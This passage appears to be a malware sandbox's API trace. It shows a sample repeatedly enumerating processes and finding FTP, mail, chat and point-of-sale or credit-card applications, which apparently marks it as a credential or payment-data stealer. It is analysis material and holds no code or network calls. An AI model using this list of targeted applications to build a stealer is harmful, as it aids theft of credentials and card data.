hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0220.692] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0220.695] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0220.698] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0220.702] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0220.704] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.707] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.710] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0220.713] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.725] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.728] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0220.730] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0220.732] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0220.735] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0220.737] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0220.740] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0220.743] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0220.746] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0220.748] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0220.751] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0220.753] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0220.756] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0220.758] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0220.761] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0220.767] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0220.770] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0220.772] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0220.775] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0220.777] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0220.778] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0220.780] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0220.783] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0220.785] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0220.787] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0220.789] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0220.791] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0220.794] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0220.796] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0220.798] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0220.800] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0220.809] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0220.812] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0220.816] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0220.818] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0220.820] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0220.822] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0220.825] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0220.827] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0220.829] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0220.831] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0220.834] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0220.836] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0220.841] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0220.859] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0220.862] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0220.864] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0220.866] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0220.869] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0220.871] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0220.873] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0220.879] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0220.883] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0220.885] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0220.888] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0220.891] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0220.895] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0220.928] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0220.932] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0220.935] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0220.937] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0220.939] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0220.941] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0220.944] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0220.946] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0220.948] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0220.950] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0220.955] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0220.959] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.962] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0220.964] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.006] Process32Next (in: hSnapshot=0x21c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0221.009] CloseHandle (hObject=0x21c8) returned 1 [0221.009] Sleep (dwMilliseconds=0x64) [0221.112] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21d4 [0221.127] Process32First (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.129] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.131] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, 